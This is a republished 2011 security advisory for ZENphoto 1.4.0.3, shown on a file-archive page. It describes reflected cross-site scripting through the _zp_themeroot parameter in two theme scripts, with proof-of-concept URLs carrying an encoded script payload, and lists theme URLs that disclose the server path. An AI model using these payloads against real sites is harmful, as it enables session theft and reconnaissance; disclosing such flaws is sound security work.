ZENphoto 1.4.0.3 Cross Site Scripting / Path Disclosure

ZENphoto 1.4.0.3 Cross Site Scripting / Path Disclosure: Posted Apr 22, 2011; Authored by High-Tech Bridge SA | Site htbridge.com; ZENphoto version 1.4.0.3 suffers from cross site scripting and path disclosure vulnerabilities.; tags | exploit, vulnerability, xss, info disclosure; SHA-256 | 1144a0505d5a54673c9cb3ad14c501b10a5311d7e4ae93639565b1b28542d45c; Download | Favorite | View

ZENphoto 1.4.0.3 Cross Site Scripting / Path Disclosure

=============================
Vulnerability ID: HTB22945
Reference: http://www.htbridge.ch/advisory/multiple_xss_in_zenphoto.html
Product: ZENphoto
Vendor: ZENphoto ( http://www.zenphoto.org/ ) 
Vulnerable Version: 1.4.0.3
Vendor Notification: 07 April 2011 
Vulnerability Type: XSS (Cross Site Scripting)
Risk level: Medium 
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "/themes/zenpage/slideshow.php" script to properly sanitize user-supplied input in "_zp_themeroot" variable then register_globals is on.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
The following PoC is available:


http://[host]/themes/zenpage/slideshow.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E


The vulnerability exists due to failure in the "/themes/stopdesign/comment_form.php" script to properly sanitize user-supplied input in "_zp_themeroot" variable then register_globals is on.
The following PoC is available:


http://[host]/themes/stopdesign/comment_form.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E



=============================
Vulnerability ID: HTB22944
Reference: http://www.htbridge.ch/advisory/path_disclousure_in_zenphoto.html
Product: ZENphoto
Vendor: Zenphoto ( http://www.zenphoto.org/ ) 
Vulnerable Version: 1.4.0.3
Vendor Notification: 07 April 2011 
Vulnerability Type: Path disclosure
Risk level: Low 
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) 

Vulnerability Details:
A remote user can determine the full path to the web root directory and other potentially sensitive information.
The following PoC is available:


http://[host]/themes/default/slideshow.php
http://[host]/themes/default/password_form.php
http://[host]/themes/effervescence_plus/404.php
http://[host]/themes/effervescence_plus/archive.php
http://[host]/themes/effervescence_plus/gallery.php
http://[host]/themes/effervescence_plus/index.php
http://[host]/themes/effervescence_plus/image.php

Top Authors In Last 30 Days

Red Hat 201 files
indoushka 118 files
Ubuntu 88 files
Gentoo 33 files
Jasper Nota 25 files
Debian 24 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,107)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,890)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,615)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,777)
UNIX (9,440)
UnixWare (187)
Windows (6,676)
Other

ZENphoto 1.4.0.3 Cross Site Scripting / Path Disclosure

ZENphoto 1.4.0.3 Cross Site Scripting / Path Disclosure

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ZENphoto 1.4.0.3 Cross Site Scripting / Path Disclosure

Share This

ZENphoto 1.4.0.3 Cross Site Scripting / Path Disclosure

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems